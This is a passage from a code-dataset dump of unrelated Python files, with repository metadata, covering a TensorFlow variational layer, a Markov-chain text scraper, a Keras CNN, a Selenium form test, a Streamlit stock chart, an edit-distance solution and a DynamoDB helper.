VariationalParameter(\n bias_posterior_fn,\n bias_posterior_tensor_fn,\n bias_prior_fn,\n bias_divergence_fn)\n\n @property\n def units(self):\n return self._units\n\n @property\n def activation(self):\n return self._activation\n\n @property\n def input_spec(self):\n return self._input_spec\n\n @input_spec.setter\n def input_spec(self, value):\n self._input_spec = value\n\n @property\n def kernel_use_local_reparameterization(self):\n return self._kernel_use_local_reparameterization\n\n @property\n def kernel(self):\n return self._kernel\n\n @property\n def bias(self):\n return self._bias\n\n def build(self, input_shape):\n input_shape = tensor_shape.TensorShape(input_shape)\n in_size = input_shape.with_rank_at_least(2)[-1].value\n if in_size is None:\n raise ValueError(\"The last dimension of the inputs to `Dense` \"\n \"should be defined. 
Found `None`.\")\n self._input_spec = layers_lib.InputSpec(min_ndim=2, axes={-1: in_size})\n dtype = dtypes.as_dtype(self.dtype)\n\n # Must have a posterior kernel.\n self.kernel.posterior = self.kernel.posterior_fn(\n dtype, [in_size, self.units], \"kernel_posterior\",\n self.trainable, self.add_variable)\n\n if self.kernel.prior_fn is None:\n self.kernel_prior = None\n else:\n self.kernel.prior = self.kernel.prior_fn(\n dtype, [in_size, self.units], \"kernel_prior\",\n self.trainable, self.add_variable)\n self._built_kernel_divergence = False\n\n if self.bias.posterior_fn is None:\n self.bias.posterior = None\n else:\n self.bias.posterior = self.bias.posterior_fn(\n dtype, [self.units], \"bias_posterior\",\n self.trainable, self.add_variable)\n\n if self.bias.prior_fn is None:\n self.bias.prior = None\n else:\n self.bias.prior = self.bias.prior_fn(\n dtype, [self.units], \"bias_prior\",\n self.trainable, self.add_variable)\n self._built_bias_divergence = False\n\n self.built = True\n\n def call(self, inputs):\n inputs = ops.convert_to_tensor(inputs, dtype=self.dtype)\n\n outputs = self._apply_variational_kernel(inputs)\n outputs = self._apply_variational_bias(outputs)\n if self.activation is not None:\n outputs = self.activation(outputs) # pylint: disable=not-callable\n if not self._built_kernel_divergence:\n self._apply_divergence(self.kernel, name=\"divergence_kernel\")\n self._built_kernel_divergence = True\n if not self._built_bias_divergence:\n self._apply_divergence(self.bias, name=\"divergence_bias\")\n self._built_bias_divergence = True\n return outputs\n\n def _apply_variational_kernel(self, inputs):\n if not self.kernel_use_local_reparameterization:\n self.kernel.posterior_tensor = self.kernel.posterior_tensor_fn(\n self.kernel.posterior)\n self.kernel.posterior_affine = None\n self.kernel.posterior_affine_tensor = None\n return self._matmul(inputs, self.kernel.posterior_tensor)\n if not isinstance(self.kernel.posterior, normal_lib.Normal):\n raise TypeError(\"`kernel_use_local_reparameterization=True` requires \"\n \"`kernel_posterior_fn` produce an instance of \"\n \"`tf.distributions.Normal` (saw: \\\"{}\\\").\".format(\n type(self.kernel.posterior).__name__))\n self.kernel.posterior_affine = normal_lib.Normal(\n loc=self._matmul(inputs, self.kernel.posterior.loc),\n scale=standard_ops.sqrt(self._matmul(\n standard_ops.square(inputs),\n standard_ops.square(self.kernel.posterior.scale))))\n self.kernel.posterior_affine_tensor = (\n self.kernel.posterior_tensor_fn(self.kernel.posterior_affine))\n self.kernel.posterior_tensor = None\n return self.kernel.posterior_affine_tensor\n\n def _apply_variational_bias(self, inputs):\n if self.bias.posterior is None:\n self.bias.posterior_tensor = None\n return inputs\n self.bias.posterior_tensor = self.bias.posterior_tensor_fn(\n self.bias.posterior)\n return nn.bias_add(inputs, self.bias.posterior_tensor)\n\n def _apply_divergence(self, param, name):\n if (param.divergence_fn is None or\n param.posterior is None or\n param.prior is None):\n param.divergence = None\n return\n param.divergence = standard_ops.identity(\n param.divergence_fn(\n param.posterior, param.prior, param.posterior_tensor),\n name=name)\n self.add_loss(param.divergence)\n\n def _matmul(self, inputs, kernel):\n if inputs.shape.ndims <= 2:\n return standard_ops.matmul(inputs, kernel)\n # To handle broadcasting, we must use `tensordot`.\n return standard_ops.tensordot(inputs, kernel, axes=[[-1], [0]])\n\n def _compute_output_shape(self, input_shape):\n input_shape = 
tensor_shape.TensorShape(input_shape).with_rank_at_least(2)\n if input_shape[-1].value is None:\n raise ValueError(\n \"The innermost dimension of input_shape must be defined, \"\n \"but saw: {}\".format(input_shape))\n return input_shape[:-1].concatenate(self.units)\n\n\ndef dense_variational(\n inputs,\n units,\n activation=None,\n activity_regularizer=None,\n trainable=True,\n kernel_use_local_reparameterization=True,\n kernel_posterior_fn=default_mean_field_normal_fn(),\n kernel_posterior_tensor_fn=lambda d: d.sample(),\n kernel_prior_fn=lambda dtype, *args: normal_lib.Normal( # pylint: disable=g-long-lambda\n loc=dtype.as_numpy_dtype(0.), scale=dtype.as_numpy_dtype(1.)),\n kernel_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n bias_posterior_fn=default_mean_field_normal_fn(is_singular=True),\n bias_posterior_tensor_fn=lambda d: d.sample(),\n bias_prior_fn=None,\n bias_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n name=None,\n reuse=None):\n \"\"\"Densely-connected variational layer.\n\n This layer implements the Bayesian variational inference analogue to:\n `outputs = activation(matmul(inputs, kernel) + bias)`\n by assuming the `kernel` and/or the `bias` are random variables.\n\n The layer implements a stochastic dense calculation by making a Monte Carlo\n approximation of a [variational Bayesian method based on KL divergence](\n https://en.wikipedia.org/wiki/Variational_Bayesian_methods), i.e.,\n\n ```none\n -log p(y|x) = -log int_{R**d} p(y|x,w) p(w) dw\n = -log int_{R**d} p(y,w|x) q(w|x) / q(w|x) dw\n <= E_q(W|x)[-log p(y,W|x) + log q(W|x)] # Jensen's\n = E_q(W|x)[-log p(y|x,W)] + KL[q(W|x), p(W)]\n ~= m**-1 sum{ -log(y|x,w[j]) : w[j] ~ q(W|x), j=1..m }\n + KL[q(W|x), p(W)]\n ```\n\n where `W` denotes the (independent) `kernel` and `bias` random variables, `w`\n is a random variate or outcome of `W`, `y` is the label, `x` is the evidence`,\n and `~=` denotes an approximation which becomes exact as `m->inf`. The above\n bound is sometimes referred to as the negative Evidence Lower BOund or\n negative [ELBO](https://arxiv.org/abs/1601.00670). In context of a DNN, this\n layer is appropriate to use when the final loss is a negative log-likelihood.\n\n The Monte-Carlo sum portion is used for the feed-forward calculation of the\n DNN. The KL divergence portion can be added to the final loss via:\n `loss += sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))`.\n\n The arguments permit separate specification of the surrogate posterior\n (`q(W|x)`), prior (`p(W)`), and divergence for both the `kernel` and `bias`\n random variables (which together comprise `W`).\n\n Args:\n inputs: Tensor input.\n units: Integer or Long, dimensionality of the output space.\n activation: Activation function (`callable`). Set it to None to maintain a\n linear activation.\n activity_regularizer: Regularizer function for the output.\n trainable: Boolean, if `True` also add variables to the graph collection\n `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n kernel_use_local_reparameterization: Python `bool` indicating whether\n `kernel` calculation should employ the Local Reparameterization Trick.\n When `True`, `kernel_posterior_fn` must create an instance of\n `tf.distributions.Normal`.\n kernel_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `kernel` parameter. 
Default value:\n `default_mean_field_normal_fn()`.\n kernel_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n kernel_prior_fn: Python `callable` which creates `tf.distributions`\n instance. See `default_mean_field_normal_fn` docstring for required\n parameter signature.\n Default value: `tf.distributions.Normal(loc=0., scale=1.)`.\n kernel_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n bias_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `bias` parameter. Default value:\n `default_mean_field_normal_fn(is_singular=True)` (which creates an\n instance of `tf.distributions.Deterministic`).\n bias_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n bias_prior_fn: Python `callable` which creates `tf.distributions` instance.\n See `default_mean_field_normal_fn` docstring for required parameter\n signature. Default value: `None` (no prior, no variational inference)\n bias_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n name: Python `str`, the name of the layer. Layers with the same name will\n share `tf.Variable`s, but to avoid mistakes we require `reuse=True` in\n such cases.\n reuse: Python `bool`, whether to reuse the `tf.Variable`s of a previous\n layer by the same name.\n\n Returns:\n output: `Tensor` representing a the affine transformed input under a random\n draw from the surrogate posterior distribution.\n \"\"\"\n layer = DenseVariational(\n units,\n activation=activation,\n activity_regularizer=activity_regularizer,\n trainable=trainable,\n kernel_use_local_reparameterization=(\n kernel_use_local_reparameterization),\n kernel_posterior_fn=kernel_posterior_fn,\n kernel_posterior_tensor_fn=kernel_posterior_tensor_fn,\n kernel_prior_fn=kernel_prior_fn,\n kernel_divergence_fn=kernel_divergence_fn,\n bias_posterior_fn=bias_posterior_fn,\n bias_posterior_tensor_fn=bias_posterior_tensor_fn,\n bias_prior_fn=bias_prior_fn,\n bias_divergence_fn=bias_divergence_fn,\n name=name,\n dtype=inputs.dtype.base_dtype,\n _scope=name,\n _reuse=reuse)\n return layer.apply(inputs)\n\n\nclass NotSet(object):\n \"\"\"Helper to track whether a `VariationalParameter` value has been set.\"\"\"\n pass\n\n\nclass VariationalParameter(object):\n \"\"\"Struct-like container of variational parameter properties.\n\n A `VariationalParameter` is intitialized with Python `callable`s which set the\n value of correspondingly named members. 
Corresponding values have \"set once\"\n semantics, i.e., once set to any value they are immutable.\n \"\"\"\n\n def __init__(\n self,\n posterior_fn,\n posterior_tensor_fn,\n prior_fn,\n divergence_fn):\n \"\"\"Creates the `VariationalParameter` struct-like object.\n\n Args:\n posterior_fn: Python `callable` which creates a\n `tf.distribution.Distribution` like object representing the posterior\n distribution. See `VariationalParameter.posterior_fn` for `callable`'s\n required parameters.\n posterior_tensor_fn: Python `callable` which computes a `Tensor`\n which represents the `posterior`.\n prior_fn: Python `callable` which creates a\n `tf.distribution.Distribution` like object representing the prior\n distribution. See `VariationalParameter.prior_fn` for `callable`'s\n required parameters.\n divergence_fn: Python `callable` which computes the KL divergence from\n `posterior` to `prior`. See `VariationalParameter.divergence_fn` for\n required `callable`'s parameters.\n \"\"\"\n self._posterior_fn = posterior_fn\n self._posterior = NotSet()\n self._posterior_tensor_fn = posterior_tensor_fn\n self._posterior_tensor = NotSet()\n self._prior_fn = prior_fn\n self._prior = NotSet()\n self._divergence_fn = divergence_fn\n self._divergence = NotSet()\n self._init_helper()\n\n @property\n def posterior_fn(self):\n \"\"\"`callable` which creates `tf.distributions.Distribution`-like posterior.\n\n The `callable` must accept the following parameters:\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n shape: Python `list`-like representing the parameter's event shape.\n dtype: Type of parameter's event.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Returns:\n posterior_fn: The Python `callable` specified in `__init__`.\n \"\"\"\n return self._posterior_fn\n\n @property\n def posterior(self):\n \"\"\"`tf.distributions.Distribution`-like instance representing posterior.\"\"\"\n return self._posterior\n\n @posterior.setter\n def posterior(self, value):\n \"\"\"One-time setter of the `posterior` distribution.\"\"\"\n if not isinstance(self._posterior, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior = value\n\n @property\n def posterior_tensor_fn(self):\n \"\"\"Creates `Tensor` representing the `posterior` distribution.\n\n The `callable` must accept the following parameters:\n posterior: `tf.distributions.Distribution`-like instance.\n\n Returns:\n posterior_tensor_fn: The Python `callable` specified in\n `__init__`.\n \"\"\"\n return self._posterior_tensor_fn\n\n @property\n def posterior_tensor(self):\n \"\"\"`Tensor` representing the `posterior` distribution.\"\"\"\n return self._posterior_tensor\n\n @posterior_tensor.setter\n def posterior_tensor(self, value):\n \"\"\"One-time setter of the `posterior_tensor`.\"\"\"\n if not isinstance(self._posterior_tensor, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior_tensor = value\n\n @property\n def prior_fn(self):\n \"\"\"`callable` which creates `tf.distributions.Distribution`-like prior.\n\n The `callable` must accept the following parameters:\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n shape: Python `list`-like representing the parameter's event shape.\n dtype: Type of parameter's event.\n 
trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Returns:\n prior_fn: The Python `callable` specified in `__init__`.\n \"\"\"\n return self._prior_fn\n\n @property\n def prior(self):\n \"\"\"`tf.distributions.Distribution`-like instance representing posterior.\"\"\"\n return self._prior\n\n @prior.setter\n def prior(self, value):\n \"\"\"One-time setter of the `prior` distribution.\"\"\"\n if not isinstance(self._prior, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._prior = value\n\n @property\n def divergence_fn(self):\n \"\"\"`callable` which computes KL-divergence `Tensor` from posterior to prior.\n\n The `callable` must accept the following parameters:\n posterior: `tf.distributions.Distribution`-like instance.\n prior: `tf.distributions.Distribution`-like instance.\n posterior_tensor: `Tensor` representing value of posterior.\n\n Returns:\n divergence_fn: The Python `callable` specified in `__init__`.\n \"\"\"\n return self._divergence_fn\n\n @property\n def divergence(self):\n \"\"\"`Tensor` representing KL-divergence from posterior to prior.\"\"\"\n return self._divergence\n\n @divergence.setter\n def divergence(self, value):\n \"\"\"One-time setter of the `divergence`.\"\"\"\n if not isinstance(self._divergence, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._divergence = value\n\n def _init_helper(self):\n pass\n\n\nclass VariationalKernelParameter(VariationalParameter):\n \"\"\"Struct-like container of variational kernel properties.\n\n A `VariationalKernelParameter` is intitialized with Python `callable`s which\n set the value of correspondingly named members. 
Corresponding values have \"set\n once\" semantics, i.e., once set to any value they are immutable.\n \"\"\"\n\n @property\n def posterior_affine(self):\n \"\"\"`tf.distributions.Distribution` affine transformed posterior.\"\"\"\n return self._posterior_affine\n\n @posterior_affine.setter\n def posterior_affine(self, value):\n \"\"\"One-time setter of `posterior_affine`.\"\"\"\n if not isinstance(self._posterior_affine, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior_affine = value\n\n @property\n def posterior_affine_tensor(self):\n \"\"\"`Tensor` representing the `posterior_affine` distribution.\"\"\"\n return self._posterior_affine_tensor\n\n @posterior_affine_tensor.setter\n def posterior_affine_tensor(self, value):\n \"\"\"One-time setter of the `posterior_affine_tensor`.\"\"\"\n if not isinstance(self._posterior_affine_tensor, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior_affine_tensor = value\n\n def _init_helper(self):\n self._posterior_affine = NotSet()\n self._posterior_affine_tensor = NotSet()\n","repo_name":"jakajacky/TensorFlowLite_Demo","sub_path":"tensorflow-master/tensorflow/contrib/bayesflow/python/ops/layers_dense_variational_impl.py","file_name":"layers_dense_variational_impl.py","file_ext":"py","file_size_in_byte":33040,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"31027854945","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport sys\nfrom collections import defaultdict\nfrom random import randint\nimport pickle\n\nSITE = \"http://www.satirev.org\"\n\n\ndef check_status(code):\n \"exits the program if page couldn't be reached\"\n if code != 200:\n print(\"failed to retrieve page\")\n exit(1)\n\n\nif __name__ == \"__main__\":\n # Command line args. Defaults to taking just first page. If there is one arg then\n # Takes pages 0-arg. 
If there are two args, takes pages arg1-arg2.\n if len(sys.argv) == 1:\n page_min = 0\n page_max = 1\n elif len(sys.argv) == 2:\n page_min = 0\n page_max = int(sys.argv[1])\n else:\n page_min = int(sys.argv[1])\n page_max = int(sys.argv[2])\n\n article_texts = [] # we build up a list of all the paragraphs in each article\n for page_num in range(page_min, page_max):\n print(\"processing page index:\", page_num)\n # get all the links on a front page tab\n request = requests.get(f\"{SITE}/us?page={page_num}#.Xk2RKxNKh25\")\n check_status(request.status_code)\n soup = BeautifulSoup(request.content, \"html.parser\")\n # convert them to proper links\n links = [\n article.find(\"a\")[\"href\"] for article\n in soup.find_all(\"div\", id=re.compile(\"node-*\"))\n ]\n for link in links:\n article_page = requests.get(SITE + link) # get an article\n check_status(article_page.status_code)\n article_soup = BeautifulSoup(article_page.content, \"html.parser\")\n article_texts.append(\"\\n\".join([\n p.text for p\n in article_soup.find(\"div\", id=\"article-content\").find_all(\"p\")\n ]))\n # get a list of all the words in all the articles\n words = re.split(\"[ \\n\\t,.;:\\\"'!?]\", \"\\n\".join(article_texts).lower())\n\n # build the markov chain\n markov = defaultdict(lambda: (0, defaultdict(int)))\n for ind, word in enumerate(words[:-1]):\n appearences, word_distribution = markov[word]\n word_distribution[words[ind+1]] += 1\n markov[word] = (appearences+1, word_distribution)\n\n # use the markov chain to predict text\n generated_text = [\"the\"]\n for _ in range(400):\n last_word = generated_text[-1]\n appearences, word_distribution = markov[last_word]\n dart = randint(0, appearences)\n for word, weight in word_distribution.items():\n dart -= weight\n if dart <= 0:\n generated_text.append(word)\n break\n\n # pickle the markov chain for later use; convert away from defaultdict\n # first, since its lambda default factory cannot be pickled\n with open(\"markov.pickle\", \"wb\") as f: # filename is arbitrary\n pickle.dump({w: (n, dict(d)) for w, (n, d) in markov.items()}, f)\n\n print(len(generated_text))\n with open(\"./output.txt\", \"w\") as f:\n f.write(\" \".join(generated_text))\n","repo_name":"jonah-harvard/Jonah_Fried_round1","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"21305678592","text":"def myMin(someList):\n\n if type(someList)!=list:\n return False\n\n # we now know that someList is a list\n \n if someList==[]:\n return False\n\n # we now know that there is at least one element in the list\n # in other words: someList[0] exists!\n\n result = someList[0] # initial assumption about the min\n\n for x in someList:\n if (x < result):\n result = x\n \n return result\n\n\n","repo_name":"UCSB-CMPTGCS20-S16/CMPTGCS20-S16-Lecture-05.03-Accumulators-Recursion","sub_path":"myMin.py","file_name":"myMin.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29405954414","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 30 00:29:34 2019\n\n@author: Himanshu\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers import Dropout\n\ndef cnn_model():\n \n classifier = Sequential()\n\n classifier.add(Convolution2D(24, 3, 3, input_shape = (124, 124, 3), activation = 'relu'))\n \n classifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n classifier.add(Convolution2D(24, 3, 3, activation = 'relu'))\n \n 
classifier.add(MaxPooling2D(pool_size=(2, 2)))\n \n classifier.add(Convolution2D(34, 3, 3, activation = 'relu'))\n \n classifier.add(MaxPooling2D(pool_size=(2, 2)))\n \n classifier.add(Flatten())\n \n classifier.add(Dense(output_dim = 40, activation = 'relu'))\n \n classifier.add(Dropout(0.2))\n \n classifier.add(Dense(output_dim = 1, activation = 'sigmoid')) \n \n classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n \n return classifier","repo_name":"himan16/Notes-Classifier","sub_path":"notesClassifier.py","file_name":"notesClassifier.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40824926531","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport random\r\nimport string\r\nimport time\r\n\r\nletters = string.ascii_uppercase\r\ntry:\r\n browser = webdriver.Chrome()\r\n browser.get(\"http://suninjuly.github.io/registration1.html\")\r\n inputs = browser.find_elements(By.TAG_NAME, 'input') # List of text fields\r\n for input in inputs:\r\n input.send_keys(''.join(random.choice(letters) for _ in range(8)))\r\n input.send_keys(\"random_word\")\r\n\r\n button = browser.find_element(By.CSS_SELECTOR, \" div button\")\r\n time.sleep(10) # waiting to visually evaluate the results of the script passing\r\n button.click()\r\n\r\n welcome_text_elt = browser.find_element(By.TAG_NAME, \"h1\")\r\n welcome_text = welcome_text_elt.text\r\n\r\n assert \"Congratulations! You have successfully registered!\" == welcome_text\r\n\r\nfinally:\r\n browser.quit()","repo_name":"RubanQA/stepik_qa_automation","sub_path":"stepik_test_automation_course/Unit1/lesson-1-6-10.py","file_name":"lesson-1-6-10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32056691174","text":"import sys\nimport math\nimport copy\nfrom typing import Tuple, List, Union\ninput = sys.stdin.readline\n\nimport re\n\ndef main():\n N, X = map(int, input().rstrip().split())\n for _ in range(N):\n x = X\n a = int(input().rstrip())\n for _ in range(a - 1):\n x = int(x / 2)\n if x % 2 == 1:\n print(1)\n else:\n print(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MokkeMeguru/dsa","sub_path":"aoj/temps/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70119258756","text":"import yfinance as yf\nimport streamlit as st\nimport datetime as dt \nfrom dateutil.relativedelta import relativedelta\n\n\nst.title(\"Stock Price Checker\")\nst.header(\"Apple, Google and Tesla\")\n\n\ntoday = dt.date.today()\nyears_ago = today-relativedelta(years=10)\n\n#define tickers\ntickers = yf.Tickers('tsla aapl googl')\n#get the historical prices for this ticker\ntickerDf = tickers.history(period='20y')\n# Open\tHigh\tLow\tClose\tVolume\tDividends\tStock Splits\n\nst.subheader(\"Close\")\nst.line_chart(tickerDf.Close)\nst.subheader(\"Volume\")\nst.line_chart(tickerDf.Volume)\n","repo_name":"codermacleod/StockPriceChecker","sub_path":"stock_price_checker.py","file_name":"stock_price_checker.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33496511050","text":"\"\"\"\n(a)(Complete Choice): for every problem instance, at least one\nchoice is 
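The banknote-classifier record above is written against the Keras 1 API: `Convolution2D(24, 3, 3, ...)` and `Dense(output_dim=...)` no longer exist in current Keras. A roughly equivalent model under the modern API would look like the following sketch (same architecture, updated names; not part of the original record):

```python
from tensorflow.keras import Sequential
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout

def cnn_model():
    model = Sequential([
        Conv2D(24, (3, 3), activation="relu", input_shape=(124, 124, 3)),
        MaxPooling2D((2, 2)),
        Conv2D(24, (3, 3), activation="relu"),
        MaxPooling2D((2, 2)),
        Conv2D(34, (3, 3), activation="relu"),
        MaxPooling2D((2, 2)),
        Flatten(),
        Dense(40, activation="relu"),    # was output_dim=40
        Dropout(0.2),
        Dense(1, activation="sigmoid"),  # binary genuine/fake output
    ])
    model.compile(optimizer="adam", loss="binary_crossentropy",
                  metrics=["accuracy"])
    return model
```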
consistent with an optimal solution.\n(b) (Inductive Structure): for each initial choice ck, show that\nmaking choice ck leaves one or more strictly smaller subproblems\nwith no external constraints relative to ck.\n(c) (Optimal Substructure): for each initial choice ck, if its induced\nsubproblems are solved optimally, then combining their\nsolutions with choice ck yields a solution that is optimal among\nall solutions that make choice ck.\n\nKey is to find the recurrence function\n\nDescription\n______________\nGiven two words word1 and word2, find the minimum number of steps required to convert word1 to word2. (each operation is counted as 1 step.)\n\nYou have the following 3 operations permitted on a word:\n\na) Insert a character\nb) Delete a character\nc) Replace a character\n\nApproach\n________________\nDefine X[i....j] and Y[i.....j] as the two substrings of X and Y\nDefine D(i, j) as the minimum edit distance between the prefixes of X and Y up to indices i and j\n\ne.g. X = abcd Y = abcde\n\n | \"\" |a |b |\n--|----|--|--|---------\n\"\"| | | |\n--|----|--|--|--------\na | | | |\n--|----|--|--|---------\nStart at the empty string\n\n\nInitialization/Base Case\n=====================\n\nD(i, 0) = i\nD(0, j) = j\n\nRecurrence\n=====================\nD(i,j) = min (\n\n D(i-1, j) + 1,\n D(i, j-1) + 1,\n D(i-1, j-1) + (0 if X[i] == Y[j] else 1)\n)\n\n\nComplexity\n_____________________\nSpace: O(m*n)\nTime : O(m*n)\n\n\"\"\"\n\n\nclass Solution(object):\n\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n m = len(word1) + 1\n n = len(word2) + 1\n DP = [[0 for _ in range(n)] for _ in range(m)]\n\n for i in range(m):\n for j in range(n):\n if i == 0:\n DP[i][j] = j\n elif j == 0:\n DP[i][j] = i\n else:\n if word1[i - 1] == word2[j - 1]:\n cost = 0\n else:\n cost = 1\n DP[i][j] = min(DP[i - 1][j] + 1, DP[i][j - 1] + 1, DP[i - 1][j - 1] + cost)\n return DP[m - 1][n - 1]\n","repo_name":"ZhengyangXu/Classified","sub_path":"9.Dynmaic_Programming/9.1_L72_Edit_Distance.py","file_name":"9.1_L72_Edit_Distance.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
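For contrast with the Python 2-flavored record above, here is a self-contained Python 3 rendering of the same O(m*n) dynamic program (an illustrative sketch of the identical recurrence):

```python
def min_distance(word1: str, word2: str) -> int:
    m, n = len(word1), len(word2)
    # dp[i][j] = edit distance between word1[:i] and word2[:j]
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        dp[i][0] = i            # delete all i characters
    for j in range(n + 1):
        dp[0][j] = j            # insert all j characters
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if word1[i - 1] == word2[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,         # delete
                           dp[i][j - 1] + 1,         # insert
                           dp[i - 1][j - 1] + cost)  # replace / match
    return dp[m][n]

assert min_distance("abcd", "abcde") == 1
```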
+{"seq_id":"8175046089","text":"import matplotlib.pyplot as plt\nimport random\n\n# Size of the checkered surface\nGRID_SIZE = 1000\n\n# Number of rectangles\nNUM_RECTANGLES = 1000\n\n# Definition of the legend\nlegend = {\n 'Wohngebäude': 'green',\n 'Bürogebäude': 'blue',\n 'Geschäft': 'red',\n 'Park': 'yellow',\n 'Schule': 'orange'\n}\n\ndef generate_city():\n # Create an empty checkered surface\n grid = [[' ' for _ in range(GRID_SIZE)] for _ in range(GRID_SIZE)]\n\n # Generate the rectangles\n rectangles = []\n for _ in range(NUM_RECTANGLES):\n # Random position and size of the rectangle\n x = random.randint(0, GRID_SIZE - 1)\n y = random.randint(0, GRID_SIZE - 1)\n width = random.randint(1, GRID_SIZE - x)\n height = random.randint(1, GRID_SIZE - y)\n\n # Randomly pick an element from the legend\n label = random.choice(list(legend.keys()))\n\n # Paint the rectangle onto the checkered surface\n for i in range(y, y + height):\n for j in range(x, x + width):\n grid[i][j] = label\n \n rectangles.append((x, y, width, height, label))\n\n # Display the checkered surface\n for row in grid:\n print(' '.join(row))\n\n # Draw the legend if at least one rectangle was generated\n if rectangles:\n labels = [r[4] for r in rectangles]\n colors = [legend[label] for label in labels]\n\n dummy_x = [0] * len(colors) # dummy coordinates\n dummy_y = [0] * len(colors) # dummy coordinates\n\n plt.scatter(dummy_x, dummy_y, color=colors, label=labels)\n plt.legend()\n plt.show()\n\n# Call the city-generation function\ngenerate_city()","repo_name":"DerFinnredstone/workplace","sub_path":"Code/python/city-generator.py","file_name":"city-generator.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17290552252","text":"\"\"\"\nDynamoDB helper methods for the Visitors table.\n\"\"\"\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\nimport logging\n\ndef get_visitor(faceid):\n\tdb_resource = boto3.resource('dynamodb')\n\tvisitors_table = db_resource.Table('Visitors')\n\tresponse = visitors_table.scan(FilterExpression = Attr('faceid').eq(faceid))\n\tprint(\"visitor response: \", response)\n\tvisitor = response['Items']\t\n\treturn visitor\n\ndef update_status(visitor_in):\n faceid = visitor_in['faceid']\n approval_status = 'approved'\n visitor = get_visitor(faceid)\n if len(visitor)>0:\n visitor = visitor[0]\n db_resource = boto3.resource('dynamodb')\n visitors_table = db_resource.Table('Visitors')\n #update status\n try:\n response_as = visitors_table.update_item(\n Key={\n 'faceid': faceid,\n },\n UpdateExpression=\"set approval_status=:approval_status\",\n ExpressionAttributeValues={\n ':approval_status': approval_status\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n \n response_ph = visitors_table.update_item(\n Key={\n 'faceid': faceid,\n },\n UpdateExpression=\"set phone_number=:phone_number\",\n ExpressionAttributeValues={\n ':phone_number': visitor_in['phone_number']\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n \n response_na = visitors_table.update_item(\n Key={\n 'faceid': faceid,\n },\n UpdateExpression=\"set visitor_name=:visitor_name\",\n ExpressionAttributeValues={\n ':visitor_name': visitor_in['visitor_name']\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n \n except ClientError as e:\n logging.error(e)\n return False\n return [response_as, response_ph, response_na]\n\ndef 